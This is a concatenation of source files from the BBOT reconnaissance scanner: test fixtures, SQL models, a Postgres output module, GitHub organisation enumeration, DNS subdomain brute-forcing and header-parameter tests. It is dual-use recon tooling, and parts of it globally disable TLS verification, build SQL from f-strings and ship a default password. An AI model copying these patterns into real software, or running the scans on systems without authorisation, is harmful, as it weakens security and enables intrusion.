import os
import ssl
import shutil
import pytest
import asyncio
import logging
from pathlib import Path
from contextlib import suppress
from omegaconf import OmegaConf
from pytest_httpserver import HTTPServer

from bbot.core import CORE
from bbot.core.helpers.misc import execute_sync_or_async
from bbot.core.helpers.interactsh import server_list as interactsh_servers

# silence stdout + trace
root_logger = logging.getLogger()
pytest_debug_file = Path(__file__).parent.parent.parent / "pytest_debug.log"
debug_handler = logging.FileHandler(pytest_debug_file)
debug_handler.setLevel(logging.DEBUG)
debug_format = logging.Formatter("%(asctime)s [%(levelname)s] %(name)s %(filename)s:%(lineno)s %(message)s")
debug_handler.setFormatter(debug_format)
root_logger.addHandler(debug_handler)

test_config = OmegaConf.load(Path(__file__).parent / "test.conf")

os.environ["BBOT_DEBUG"] = "True"
CORE.logger.log_level = logging.DEBUG

# silence all stderr output:
stderr_handler = CORE.logger.log_handlers["stderr"]
stderr_handler.setLevel(logging.CRITICAL)
handlers = list(CORE.logger.listener.handlers)
handlers.remove(stderr_handler)
CORE.logger.listener.handlers = tuple(handlers)

for h in root_logger.handlers:
    h.addFilter(lambda x: x.levelname not in ("STDOUT", "TRACE"))


CORE.merge_default(test_config)


@pytest.fixture
def assert_all_responses_were_requested() -> bool:
    return False


@pytest.fixture(autouse=True)
def silence_live_logging():
    for handler in logging.getLogger().handlers:
        if type(handler).__name__ == "_LiveLoggingStreamHandler":
            handler.setLevel(logging.CRITICAL)


@pytest.fixture
def bbot_httpserver():
    server = HTTPServer(host="127.0.0.1", port=8888, threaded=True)
    server.start()

    yield server

    server.clear()
    if server.is_running():
        server.stop()

    # this is to check if the client has made any request where no
    # `assert_request` was called on it from the test

    server.check_assertions()
    server.clear()


@pytest.fixture
def bbot_httpserver_ssl():
    context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    current_dir = Path(__file__).parent
    keyfile = str(current_dir / "testsslkey.pem")
    certfile = str(current_dir / "testsslcert.pem")
    context.load_cert_chain(certfile, keyfile)
    server = HTTPServer(host="127.0.0.1", port=9999, ssl_context=context, threaded=True)
    server.start()

    yield server

    server.clear()
    if server.is_running():
        server.stop()

    # this is to check if the client has made any request where no
    # `assert_request` was called on it from the test

    server.check_assertions()
    server.clear()


def should_mock(request):
    return not request.url.host in ["127.0.0.1", "localhost", "raw.githubusercontent.com"] + interactsh_servers


def pytest_collection_modifyitems(config, items):
    # make sure all tests have the httpx_mock marker
    for item in items:
        item.add_marker(
            pytest.mark.httpx_mock(
                should_mock=should_mock,
                assert_all_requests_were_expected=False,
                assert_all_responses_were_requested=False,
                can_send_already_matched_responses=True,
            )
        )


@pytest.fixture
def bbot_httpserver_allinterfaces():
    server = HTTPServer(host="0.0.0.0", port=5556, threaded=True)
    server.start()

    yield server

    server.clear()
    if server.is_running():
        server.stop()
    server.check_assertions()
    server.clear()


class Interactsh_mock:
    def __init__(self, name):
        self.name = name
        self.log = logging.getLogger(f"bbot.interactsh.{self.name}")
        self.interactions = []
        self.correlation_id = "deadbeef-dead-beef-dead-beefdeadbeef"
        self.stop = False
        self.poll_task = None

    def mock_interaction(self, subdomain_tag, msg=None):
        self.log.info(f"Mocking interaction to subdomain tag: {subdomain_tag}")
        if msg is not None:
            self.log.info(msg)
        self.interactions.append(subdomain_tag)

    async def register(self, callback=None):
        if callable(callback):
            self.poll_task = asyncio.create_task(self.poll_loop(callback))
        return "fakedomain.fakeinteractsh.com"

    async def deregister(self, callback=None):
        self.stop = True
        if self.poll_task is not None:
            self.poll_task.cancel()
            with suppress(BaseException):
                await self.poll_task

    async def poll_loop(self, callback=None):
        while not self.stop:
            data_list = await self.poll(callback)
            if not data_list:
                await asyncio.sleep(1)
                continue

    async def poll(self, callback=None):
        poll_results = []
        for subdomain_tag in self.interactions:
            result = {"full-id": f"{subdomain_tag}.fakedomain.fakeinteractsh.com", "protocol": "HTTP"}
            poll_results.append(result)
            if callback is not None:
                await execute_sync_or_async(callback, result)
        self.interactions = []
        return poll_results


import threading
import http.server
import socketserver
import urllib.request


class Proxy(http.server.SimpleHTTPRequestHandler):
    protocol_version = "HTTP/1.0"
    server_version = "Proxy"
    urls = []

    def do_GET(self):
        self.urls.append(self.path)

        # Extract host and port from path
        netloc = urllib.parse.urlparse(self.path).netloc
        host, _, port = netloc.partition(":")

        # Fetch the content
        conn = http.client.HTTPConnection(host, port if port else 80)
        conn.request("GET", self.path, headers=self.headers)
        response = conn.getresponse()

        # Send the response back to the client
        self.send_response(response.status)
        for header, value in response.getheaders():
            self.send_header(header, value)
        self.end_headers()
        self.copyfile(response, self.wfile)

        response.close()
        conn.close()


@pytest.fixture
def proxy_server():
    # Set up an HTTP server that acts as a simple proxy.
    server = socketserver.ThreadingTCPServer(("localhost", 0), Proxy)

    # Start the server in a new thread.
    server_thread = threading.Thread(target=server.serve_forever, daemon=True)
    server_thread.start()

    yield server

    # Stop the server.
    server.shutdown()
    server_thread.join()


def pytest_terminal_summary(terminalreporter, exitstatus, config):  # pragma: no cover
    RED = "\033[1;31m"
    GREEN = "\033[1;32m"
    YELLOW = "\033[1;33m"
    BLUE = "\033[1;34m"
    CYAN = "\033[1;36m"
    RESET = "\033[0m"
    stats = terminalreporter.stats
    total_tests = len(terminalreporter._session.items)
    passed = len(stats.get("passed", []))
    skipped = len(stats.get("skipped", []))
    errors = len(stats.get("error", []))
    failed = stats.get("failed", [])

    terminalreporter.write("\nTest Session Summary:")
    terminalreporter.write(f"\nTotal tests run: {total_tests}")
    terminalreporter.write(
        f"\n{GREEN}Passed: {passed}{RESET}, {RED}Failed: {len(failed)}{RESET}, {YELLOW}Skipped: {skipped}{RESET}, Errors: {errors}"
    )

    if failed:
        terminalreporter.write(f"\n{RED}Detailed failed test report:{RESET}")
        for item in failed:
            test_name = item.nodeid.split("::")[-1] if "::" in item.nodeid else item.nodeid
            file_and_line = f"{item.location[0]}:{item.location[1]}"  # File path and line number
            terminalreporter.write(f"\n{BLUE}Test Name: {test_name}{RESET} {CYAN}({file_and_line}){RESET}")
            terminalreporter.write(f"\n{RED}Location: {item.nodeid} at {item.location[0]}:{item.location[1]}{RESET}")
            terminalreporter.write(f"\n{RED}Failure details:\n{item.longreprtext}{RESET}")


# BELOW: debugging for frozen/hung tests
import psutil
import traceback
import inspect


def _print_detailed_info():  # pragma: no cover
    """
    Debugging pytests hanging
    """
    print("=== Detailed Thread and Process Information ===\n")
    try:
        print("=== Threads ===")
        for thread in threading.enumerate():
            print(f"Thread Name: {thread.name}")
            print(f"Thread ID: {thread.ident}")
            print(f"Is Alive: {thread.is_alive()}")
            print(f"Daemon: {thread.daemon}")

            if hasattr(thread, "_target"):
                target = thread._target
                if target:
                    qualname = (
                        f"{target.__module__}.{target.__qualname__}"
                        if hasattr(target, "__qualname__")
                        else str(target)
                    )
                    print(f"Target Function: {qualname}")

                    if hasattr(thread, "_args"):
                        args = thread._args
                        kwargs = thread._kwargs if hasattr(thread, "_kwargs") else {}
                        arg_spec = inspect.getfullargspec(target)

                        all_args = list(args) + [f"{k}={v}" for k, v in kwargs.items()]

                        if inspect.ismethod(target) and arg_spec.args[0] == "self":
                            arg_spec.args.pop(0)

                        named_args = list(zip(arg_spec.args, all_args))
                        if arg_spec.varargs:
                            named_args.extend((f"*{arg_spec.varargs}", arg) for arg in all_args[len(arg_spec.args) :])

                        print("Arguments:")
                        for name, value in named_args:
                            print(f"  {name}: {value}")
                else:
                    print("Target Function: None")
            else:
                print("Target Function: Unknown")

            print()

        print("=== Processes ===")
        current_process = psutil.Process()
        for child in current_process.children(recursive=True):
            print(f"Process ID: {child.pid}")
            print(f"Name: {child.name()}")
            print(f"Status: {child.status()}")
            print(f"CPU Times: {child.cpu_times()}")
            print(f"Memory Info: {child.memory_info()}")
            print()

        print("=== Current Process ===")
        print(f"Process ID: {current_process.pid}")
        print(f"Name: {current_process.name()}")
        print(f"Status: {current_process.status()}")
        print(f"CPU Times: {current_process.cpu_times()}")
        print(f"Memory Info: {current_process.memory_info()}")
        print()

    except Exception as e:
        print(f"An error occurred: {str(e)}")
        print("Traceback:")
        traceback.print_exc()


@pytest.hookimpl(tryfirst=True, hookwrapper=True)
def pytest_sessionfinish(session, exitstatus):
    # Remove handlers from all loggers to prevent logging errors at exit
    loggers = [logging.getLogger("bbot")] + list(logging.Logger.manager.loggerDict.values())
    for logger in loggers:
        handlers = getattr(logger, "handlers", [])
        for handler in handlers:
            logger.removeHandler(handler)

    # Wipe out BBOT home dir
    shutil.rmtree("/tmp/.bbot_test", ignore_errors=True)

    yield

    # temporarily suspend stdout capture and print detailed thread info
    capmanager = session.config.pluginmanager.get_plugin("capturemanager")
    if capmanager:
        capmanager.suspend_global_capture(in_=True)

    _print_detailed_info()

    if capmanager:
        capmanager.resume_global_capture()



# This file contains SQLModel (Pydantic + SQLAlchemy) models for BBOT events, scans, and targets.
# Used by the SQL output modules, but portable for outside use.

import json
import logging
from pydantic import ConfigDict
from typing import List, Optional
from datetime import datetime, timezone
from typing_extensions import Annotated
from pydantic.functional_validators import AfterValidator
from sqlmodel import inspect, Column, Field, SQLModel, JSON, String, DateTime as SQLADateTime


log = logging.getLogger("bbot_server.models")


def naive_datetime_validator(d: datetime):
    """
    Converts all dates into UTC, then drops timezone information.

    This is needed to prevent inconsistencies in sqlite, because it is timezone-naive.
    """
    # drop timezone info
    return d.replace(tzinfo=None)


NaiveUTC = Annotated[datetime, AfterValidator(naive_datetime_validator)]


class CustomJSONEncoder(json.JSONEncoder):
    def default(self, obj):
        # handle datetime
        if isinstance(obj, datetime):
            return obj.isoformat()
        return super().default(obj)


class BBOTBaseModel(SQLModel):
    model_config = ConfigDict(extra="ignore")

    def __init__(self, *args, **kwargs):
        self._validated = None
        super().__init__(*args, **kwargs)

    @property
    def validated(self):
        try:
            if self._validated is None:
                self._validated = self.__class__.model_validate(self)
            return self._validated
        except AttributeError:
            return self

    def to_json(self, **kwargs):
        return json.dumps(self.validated.model_dump(), sort_keys=True, cls=CustomJSONEncoder, **kwargs)

    @classmethod
    def _pk_column_names(cls):
        return [column.name for column in inspect(cls).primary_key]

    def __hash__(self):
        return hash(self.to_json())

    def __eq__(self, other):
        return hash(self) == hash(other)


### EVENT ###


class Event(BBOTBaseModel, table=True):

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        data = self._get_data(self.data, self.type)
        self.data = {self.type: data}
        if self.host:
            self.reverse_host = self.host[::-1]

    def get_data(self):
        return self._get_data(self.data, self.type)

    @staticmethod
    def _get_data(data, type):
        # handle SIEM-friendly format
        if isinstance(data, dict) and list(data) == [type]:
            return data[type]
        return data

    uuid: str = Field(
        primary_key=True,
        index=True,
        nullable=False,
    )
    id: str = Field(index=True)
    type: str = Field(index=True)
    scope_description: str
    data: dict = Field(sa_type=JSON)
    host: Optional[str]
    port: Optional[int]
    netloc: Optional[str]
    # store the host in reversed form for efficient lookups by domain
    reverse_host: Optional[str] = Field(default="", exclude=True, index=True)
    resolved_hosts: List = Field(default=[], sa_type=JSON)
    dns_children: dict = Field(default={}, sa_type=JSON)
    web_spider_distance: int = 10
    scope_distance: int = Field(default=10, index=True)
    scan: str = Field(index=True)
    timestamp: NaiveUTC = Field(index=True)
    parent: str = Field(index=True)
    tags: List = Field(default=[], sa_type=JSON)
    module: str = Field(index=True)
    module_sequence: str
    discovery_context: str = ""
    discovery_path: List[str] = Field(default=[], sa_type=JSON)
    parent_chain: List[str] = Field(default=[], sa_type=JSON)
    inserted_at: NaiveUTC = Field(default_factory=lambda: datetime.now(timezone.utc))


### SCAN ###


class Scan(BBOTBaseModel, table=True):
    id: str = Field(primary_key=True)
    name: str
    status: str
    started_at: NaiveUTC = Field(index=True)
    finished_at: Optional[NaiveUTC] = Field(default=None, sa_column=Column(SQLADateTime, nullable=True, index=True))
    duration_seconds: Optional[float] = Field(default=None)
    duration: Optional[str] = Field(default=None)
    target: dict = Field(sa_type=JSON)
    preset: dict = Field(sa_type=JSON)


### TARGET ###


class Target(BBOTBaseModel, table=True):
    name: str = "Default Target"
    strict_scope: bool = False
    seeds: List = Field(default=[], sa_type=JSON)
    whitelist: List = Field(default=None, sa_type=JSON)
    blacklist: List = Field(default=[], sa_type=JSON)
    hash: str = Field(sa_column=Column("hash", String, unique=True, primary_key=True, index=True))
    scope_hash: str = Field(sa_column=Column("scope_hash", String, index=True))
    seed_hash: str = Field(sa_column=Column("seed_hashhash", String, index=True))
    whitelist_hash: str = Field(sa_column=Column("whitelist_hash", String, index=True))
    blacklist_hash: str = Field(sa_column=Column("blacklist_hash", String, index=True))



from bbot.modules.templates.sql import SQLTemplate


class Postgres(SQLTemplate):
    watched_events = ["*"]
    meta = {"description": "Output scan data to a SQLite database"}
    options = {
        "username": "postgres",
        "password": "bbotislife",
        "host": "localhost",
        "port": 5432,
        "database": "bbot",
    }
    options_desc = {
        "username": "The username to connect to Postgres",
        "password": "The password to connect to Postgres",
        "host": "The server running Postgres",
        "port": "The port to connect to Postgres",
        "database": "The database name to connect to",
    }
    deps_pip = ["sqlmodel", "asyncpg"]
    protocol = "postgresql+asyncpg"

    async def create_database(self):
        import asyncpg
        from sqlalchemy import text
        from sqlalchemy.ext.asyncio import create_async_engine

        # Create the engine for the initial connection to the server
        initial_engine = create_async_engine(self.connection_string().rsplit("/", 1)[0])

        async with initial_engine.connect() as conn:
            # Check if the database exists
            result = await conn.execute(text(f"SELECT 1 FROM pg_database WHERE datname = '{self.database}'"))
            database_exists = result.scalar() is not None

            # Create the database if it does not exist
            if not database_exists:
                # Use asyncpg directly to create the database
                raw_conn = await asyncpg.connect(
                    user=self.username,
                    password=self.password,
                    host=self.host,
                    port=self.port,
                )
                try:
                    await raw_conn.execute(f"CREATE DATABASE {self.database}")
                finally:
                    await raw_conn.close()



from bbot.modules.templates.github import github


class github_org(github):
    watched_events = ["ORG_STUB", "SOCIAL"]
    produced_events = ["CODE_REPOSITORY"]
    flags = ["passive", "subdomain-enum", "safe", "code-enum"]
    meta = {
        "description": "Query Github's API for organization and member repositories",
        "created_date": "2023-12-14",
        "author": "@domwhewell-sage",
    }
    options = {"api_key": "", "include_members": True, "include_member_repos": False}
    options_desc = {
        "api_key": "Github token",
        "include_members": "Enumerate organization members",
        "include_member_repos": "Also enumerate organization members' repositories",
    }

    scope_distance_modifier = 2

    async def setup(self):
        self.include_members = self.config.get("include_members", True)
        self.include_member_repos = self.config.get("include_member_repos", False)
        return await super().setup()

    async def filter_event(self, event):
        if event.type == "SOCIAL":
            if event.data.get("platform", "") != "github":
                return False, "event is not a github profile"
            # reject org members if the setting isn't enabled
            # this prevents gathering of org member repos
            if (not self.include_member_repos) and ("github-org-member" in event.tags):
                return False, "include_member_repos is False"
        return True

    async def handle_event(self, event):
        # handle github profile
        if event.type == "SOCIAL":
            user = event.data.get("profile_name", "")
            in_scope = False
            if "github-org-member" in event.tags:
                is_org = False
            elif "github-org" in event.tags:
                is_org = True
                in_scope = True
            else:
                is_org, in_scope = await self.validate_org(user)

            # find repos from user/org (SOCIAL --> CODE_REPOSITORY)
            repos = []
            if is_org:
                if in_scope:
                    self.verbose(f"Searching for repos belonging to organization {user}")
                    repos = await self.query_org_repos(user)
                else:
                    self.verbose(f"Organization {user} does not appear to be in-scope")
            elif "github-org-member" in event.tags:
                self.verbose(f"Searching for repos belonging to user {user}")
                repos = await self.query_user_repos(user)
            for repo_url in repos:
                repo_event = self.make_event({"url": repo_url}, "CODE_REPOSITORY", tags="git", parent=event)
                if not repo_event:
                    continue
                await self.emit_event(
                    repo_event,
                    context=f"{{module}} listed repos for GitHub profile and discovered {{event.type}}: {repo_url}",
                )

            # find members from org (SOCIAL --> SOCIAL)
            if is_org and self.include_members:
                self.verbose(f"Searching for any members belonging to {user}")
                org_members = await self.query_org_members(user)
                for member in org_members:
                    member_url = f"https://github.com/{member}"
                    event_data = {"platform": "github", "profile_name": member, "url": member_url}
                    member_event = self.make_event(event_data, "SOCIAL", tags="github-org-member", parent=event)
                    if member_event:
                        await self.emit_event(
                            member_event,
                            context=f"{{module}} listed members of GitHub organization and discovered {{event.type}}: {member_url}",
                        )

        # find valid orgs from stub (ORG_STUB --> SOCIAL)
        elif event.type == "ORG_STUB":
            user = event.data
            self.verbose(f"Validating whether the organization {user} is within our scope...")
            is_org, in_scope = await self.validate_org(user)
            if "target" in event.tags:
                in_scope = True
            if not is_org or not in_scope:
                self.verbose(f"Unable to validate that {user} is in-scope, skipping...")
                return

            user_url = f"https://github.com/{user}"
            event_data = {"platform": "github", "profile_name": user, "url": user_url}
            github_org_event = self.make_event(event_data, "SOCIAL", tags="github-org", parent=event)
            if github_org_event:
                await self.emit_event(
                    github_org_event,
                    context=f'{{module}} tried "{user}" as GitHub profile and discovered {{event.type}}: {user_url}',
                )

    async def query_org_repos(self, query):
        repos = []
        url = f"{self.base_url}/orgs/{self.helpers.quote(query)}/repos?per_page=100&page=" + "{page}"
        agen = self.api_page_iter(url, json=False)
        try:
            async for r in agen:
                if r is None:
                    break
                status_code = getattr(r, "status_code", 0)
                if status_code == 403:
                    self.warning("Github is rate-limiting us (HTTP status: 403)")
                    break
                if status_code != 200:
                    break
                try:
                    j = r.json()
                except Exception as e:
                    self.warning(f"Failed to decode JSON for {r.url} (HTTP status: {status_code}): {e}")
                    break
                if not j:
                    break
                for item in j:
                    html_url = item.get("html_url", "")
                    repos.append(html_url)
        finally:
            agen.aclose()
        return repos

    async def query_org_members(self, query):
        members = []
        url = f"{self.base_url}/orgs/{self.helpers.quote(query)}/members?per_page=100&page=" + "{page}"
        agen = self.api_page_iter(url, json=False)
        try:
            async for r in agen:
                if r is None:
                    break
                status_code = getattr(r, "status_code", 0)
                if status_code == 403:
                    self.warning("Github is rate-limiting us (HTTP status: 403)")
                    break
                if status_code != 200:
                    break
                try:
                    j = r.json()
                except Exception as e:
                    self.warning(f"Failed to decode JSON for {r.url} (HTTP status: {status_code}): {e}")
                    break
                if not j:
                    break
                for item in j:
                    login = item.get("login", "")
                    members.append(login)
        finally:
            agen.aclose()
        return members

    async def query_user_repos(self, query):
        repos = []
        url = f"{self.base_url}/users/{self.helpers.quote(query)}/repos?per_page=100&page=" + "{page}"
        agen = self.api_page_iter(url, json=False)
        try:
            async for r in agen:
                if r is None:
                    break
                status_code = getattr(r, "status_code", 0)
                if status_code == 403:
                    self.warning("Github is rate-limiting us (HTTP status: 403)")
                    break
                if status_code != 200:
                    break
                try:
                    j = r.json()
                except Exception as e:
                    self.warning(f"Failed to decode JSON for {r.url} (HTTP status: {status_code}): {e}")
                    break
                if not j:
                    break
                for item in j:
                    html_url = item.get("html_url", "")
                    repos.append(html_url)
        finally:
            agen.aclose()
        return repos

    async def validate_org(self, org):
        is_org = False
        in_scope = False
        url = f"{self.base_url}/orgs/{org}"
        r = await self.api_request(url)
        if r is None:
            return is_org, in_scope
        status_code = getattr(r, "status_code", 0)
        if status_code == 403:
            self.warning("Github is rate-limiting us (HTTP status: 403)")
            return is_org, in_scope
        if status_code == 200:
            is_org = True
        try:
            json = r.json()
        except Exception as e:
            self.warning(f"Failed to decode JSON for {r.url} (HTTP status: {status_code}): {e}")
            return is_org, in_scope
        for k, v in json.items():
            if (
                isinstance(v, str)
                and (
                    self.helpers.is_dns_name(v, include_local=False)
                    or self.helpers.is_url(v)
                    or self.helpers.is_email(v)
                )
                and self.scan.in_scope(v)
            ):
                self.verbose(f'Found in-scope key "{k}": "{v}" for {org}, it appears to be in-scope')
                in_scope = True
                break
        return is_org, in_scope



from bbot.modules.templates.subdomain_enum import subdomain_enum


class dnsbrute(subdomain_enum):
    flags = ["subdomain-enum", "active", "aggressive"]
    watched_events = ["DNS_NAME"]
    produced_events = ["DNS_NAME"]
    meta = {
        "description": "Brute-force subdomains with massdns + static wordlist",
        "author": "@TheTechromancer",
        "created_date": "2024-04-24",
    }
    options = {
        "wordlist": "https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/DNS/subdomains-top1million-5000.txt",
        "max_depth": 5,
    }
    options_desc = {
        "wordlist": "Subdomain wordlist URL",
        "max_depth": "How many subdomains deep to brute force, i.e. 5.4.3.2.1.evilcorp.com",
    }
    deps_common = ["massdns"]
    reject_wildcards = "strict"
    dedup_strategy = "lowest_parent"
    _qsize = 10000

    async def setup(self):
        self.max_depth = max(1, self.config.get("max_depth", 5))
        self.subdomain_file = await self.helpers.wordlist(self.config.get("wordlist"))
        self.subdomain_list = set(self.helpers.read_file(self.subdomain_file))
        self.wordlist_size = len(self.subdomain_list)
        return await super().setup()

    async def filter_event(self, event):
        eligible, reason = await super().filter_event(event)
        query = self.make_query(event)

        # limit brute force depth
        subdomain_depth = self.helpers.subdomain_depth(query) + 1
        if subdomain_depth > self.max_depth:
            eligible = False
            reason = f"subdomain depth of *.{query} ({subdomain_depth}) > max_depth ({self.max_depth})"

        # don't brute-force things that look like autogenerated PTRs
        if self.helpers.dns.brute.has_excessive_digits(query):
            eligible = False
            reason = f'"{query}" looks like an autogenerated PTR'

        return eligible, reason

    async def handle_event(self, event):
        query = self.make_query(event)
        self.info(f"Brute-forcing {self.wordlist_size:,} subdomains for {query} (source: {event.data})")
        for hostname in await self.helpers.dns.brute(self, query, self.subdomain_list):
            await self.emit_event(
                hostname,
                "DNS_NAME",
                parent=event,
                context=f'{{module}} tried {self.wordlist_size:,} subdomains against "{query}" and found {{event.type}}: {{event.data}}',
            )



from bbot.core.helpers import helper

from .base import ModuleTestBase, tempwordlist


class Paramminer_Headers(ModuleTestBase):
    targets = ["http://127.0.0.1:8888"]
    modules_overrides = ["httpx", "paramminer_headers"]
    config_overrides = {"modules": {"paramminer_headers": {"wordlist": tempwordlist(["junkword1", "tracestate"])}}}

    headers_body = """
    <html>
    <title>the title</title>
    <body>
    <p>Hello null!</p>';
    </body>
    </html>
    """

    headers_body_match = """
    <html>
    <title>the title</title>
    <body>
    <p>Hello AAAAAAAAAAAAAA!</p>';
    </body>
    </html>
    """

    async def setup_after_prep(self, module_test):
        module_test.scan.modules["paramminer_headers"].rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA"
        module_test.monkeypatch.setattr(
            helper.HttpCompare, "gen_cache_buster", lambda *args, **kwargs: {"AAAAAA": "1"}
        )
        expect_args = dict(headers={"tracestate": "AAAAAAAAAAAAAA"})
        respond_args = {"response_data": self.headers_body_match}
        module_test.set_expect_requests(expect_args=expect_args, respond_args=respond_args)

        respond_args = {"response_data": self.headers_body}
        module_test.set_expect_requests(respond_args=respond_args)

    def check(self, module_test, events):

        found_reflected_header = False
        false_positive_match = False

        for e in events:
            if e.type == "WEB_PARAMETER":
                if "[Paramminer] Header: [tracestate] Reasons: [body] Reflection: [True]" in e.data["description"]:
                    found_reflected_header = True

                if "junkword1" in e.data["description"]:
                    false_positive_match = True

        assert found_reflected_header, "Failed to find hidden reflected header parameter"
        assert not false_positive_match, "Found word which was in wordlist but not a real match"


class TestParamminer_Headers(Paramminer_Headers):
    pass


class TestParamminer_Headers_noreflection(Paramminer_Headers):

    found_nonreflected_header = False

    headers_body_match = """
    <html>
    <title>the title</title>
    <body>
    <p>Hello Administrator!</p>';
    </body>
    </html>
    """

    def check(self, module_test, events):
        for e in events:
            if e.type == "WEB_PARAMETER":
                if "[Paramminer] Header: [tracestate] Reasons: [body] Reflection: [False]" in e.data["description"]:
                    found_nonreflected_header = True

        assert found_nonreflected_header, "Failed to find hidden non-reflected header parameter"


class TestParamminer_Headers_extract(Paramminer_Headers):

    modules_overrides = ["httpx", "paramminer_headers", "excavate"]
    config_overrides = {
        "modules": {
            "paramminer_headers": {"wordlist": tempwordlist(["junkword1", "tracestate"]), "recycle_words": True}
        }
    }

    headers_body = """
    <html>
    <title>the title</title>
    <body>
    <a href="/page?foo=AAAAAAAAAAAAAA">Click Me</a>
    </body>
    </html>
    """

    headers_body_match = """
    <html>
    <title>the title</title>
    <body>
    <a href="/page?foo=AAAAAAAAAAAAAA">Click Me</a>
    <a href="/page?foo=http://thisisjunk.com?whatever=value">Click Me</a>
    <p>Secret param "foo" found with value: AAAAAAAAAAAAAA</p>
    </body>
    </html>
    """

    async def setup_after_prep(self, module_test):
        module_test.scan.modules["paramminer_headers"].rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA"
        module_test.monkeypatch.setattr(
            helper.HttpCompare, "gen_cache_buster", lambda *args, **kwargs: {"AAAAAA": "1"}
        )
        expect_args = dict(headers={"foo": "AAAAAAAAAAAAAA"})
        respond_args = {"response_data": self.headers_body_match}
        module_test.set_expect_requests(expect_args=expect_args, respond_args=respond_args)

        respond_args = {"response_data": self.headers_body}
        module_test.set_expect_requests(respond_args=respond_args)

    def check(self, module_test, events):

        excavate_extracted_web_parameter = False
        used_recycled_parameter = False

        for e in events:
            if e.type == "WEB_PARAMETER":
                if "HTTP Extracted Parameter [foo] (HTML Tags Submodule)" in e.data["description"]:
                    excavate_extracted_web_parameter = True
                if "[Paramminer] Header: [foo] Reasons: [body] Reflection: [True]" in e.data["description"]:
                    used_recycled_parameter = True

        assert excavate_extracted_web_parameter, "Excavate failed to extract WEB_PARAMETER"
        assert used_recycled_parameter, "Failed to find header with recycled parameter"


class TestParamminer_Headers_extract_norecycle(TestParamminer_Headers_extract):

    modules_overrides = ["httpx", "excavate"]
    config_overrides = {}

    async def setup_after_prep(self, module_test):

        respond_args = {"response_data": self.headers_body}
        module_test.set_expect_requests(respond_args=respond_args)

    def check(self, module_test, events):

        excavate_extracted_web_parameter = False

        for e in events:
            if e.type == "WEB_PARAMETER":
                if "HTTP Extracted Parameter [foo] (HTML Tags Submodule)" in e.data["description"]:
                    excavate_extracted_web_parameter = True

        assert (
            not excavate_extracted_web_parameter
        ), "Excavate extract WEB_PARAMETER despite disabling parameter extraction"



import os
import sys
import omegaconf
from pathlib import Path

from bbot.core.helpers.misc import cpu_architecture, os_platform, os_platform_friendly


REQUESTS_PATCHED = False


def increase_limit(new_limit):
    try:
        import resource

        # Get current limit
        soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_NOFILE)

        new_limit = min(new_limit, hard_limit)

        # Attempt to set new limit
        resource.setrlimit(resource.RLIMIT_NOFILE, (new_limit, hard_limit))
    except Exception as e:
        sys.stderr.write(f"Failed to set new ulimit: {e}\n")


increase_limit(65535)


# Custom custom omegaconf resolver to get environment variables
def env_resolver(env_name, default=None):
    return os.getenv(env_name, default)


def add_to_path(v, k="PATH", environ=None):
    """
    Add an entry to a colon-separated PATH variable.
    If it's already contained in the value, shift it to be in first position.
    """
    if environ is None:
        environ = os.environ
    var_list = os.environ.get(k, "").split(":")
    deduped_var_list = []
    for _ in var_list:
        if _ != v and _ not in deduped_var_list:
            deduped_var_list.append(_)
    deduped_var_list = [v] + deduped_var_list
    new_var_str = ":".join(deduped_var_list).strip(":")
    environ[k] = new_var_str


# if we're running in a virtual environment, make sure to include its /bin in PATH
if sys.prefix != sys.base_prefix:
    bin_dir = str(Path(sys.prefix) / "bin")
    add_to_path(bin_dir)

# add ~/.local/bin to PATH
local_bin_dir = str(Path.home() / ".local" / "bin")
add_to_path(local_bin_dir)


# Register the new resolver
# this allows you to substitute environment variables in your config like "${env:PATH}""
omegaconf.OmegaConf.register_new_resolver("env", env_resolver)


class BBOTEnviron:

    def __init__(self, preset):
        self.preset = preset

    def flatten_config(self, config, base="bbot"):
        """
        Flatten a JSON-like config into a list of environment variables:
            {"modules": [{"httpx": {"timeout": 5}}]} --> "BBOT_MODULES_HTTPX_TIMEOUT=5"
        """
        if type(config) == omegaconf.dictconfig.DictConfig:
            for k, v in config.items():
                new_base = f"{base}_{k}"
                if type(v) == omegaconf.dictconfig.DictConfig:
                    yield from self.flatten_config(v, base=new_base)
                elif type(v) != omegaconf.listconfig.ListConfig:
                    yield (new_base.upper(), str(v))

    def prepare(self):
        """
        Sync config to OS environment variables
        """
        environ = dict(os.environ)

        # ensure bbot_tools
        environ["BBOT_TOOLS"] = str(self.preset.core.tools_dir)
        add_to_path(str(self.preset.core.tools_dir), environ=environ)
        # ensure bbot_cache
        environ["BBOT_CACHE"] = str(self.preset.core.cache_dir)
        # ensure bbot_temp
        environ["BBOT_TEMP"] = str(self.preset.core.temp_dir)
        # ensure bbot_lib
        environ["BBOT_LIB"] = str(self.preset.core.lib_dir)
        # export LD_LIBRARY_PATH=${LD_LIBRARY_PATH}:~/.bbot/lib/
        add_to_path(str(self.preset.core.lib_dir), k="LD_LIBRARY_PATH", environ=environ)

        # platform variables
        environ["BBOT_OS_PLATFORM"] = os_platform()
        environ["BBOT_OS"] = os_platform_friendly()
        environ["BBOT_CPU_ARCH"] = cpu_architecture()

        # copy config to environment
        bbot_environ = self.flatten_config(self.preset.config)
        environ.update(bbot_environ)

        # handle HTTP proxy
        http_proxy = self.preset.config.get("web", {}).get("http_proxy", "")
        if http_proxy:
            environ["HTTP_PROXY"] = http_proxy
            environ["HTTPS_PROXY"] = http_proxy
        else:
            environ.pop("HTTP_PROXY", None)
            environ.pop("HTTPS_PROXY", None)

        # ssl verification
        import urllib3

        urllib3.disable_warnings()
        ssl_verify = self.preset.config.get("ssl_verify", False)

        global REQUESTS_PATCHED
        if not ssl_verify and not REQUESTS_PATCHED:
            REQUESTS_PATCHED = True
            import requests
            import functools

            requests.adapters.BaseAdapter.send = functools.partialmethod(
                requests.adapters.BaseAdapter.send, verify=False
            )
            requests.adapters.HTTPAdapter.send = functools.partialmethod(
                requests.adapters.HTTPAdapter.send, verify=False
            )
            requests.Session.request = functools.partialmethod(requests.Session.request, verify=False)
            requests.request = functools.partial(requests.request, verify=False)

        return environ



import logging
import ipaddress
from contextlib import suppress

from bbot.errors import ValidationError
from bbot.core.helpers.regexes import event_type_regexes
from bbot.core.helpers import smart_decode, smart_encode_punycode


log = logging.getLogger("bbot.core.event.helpers")


def get_event_type(data):
    """
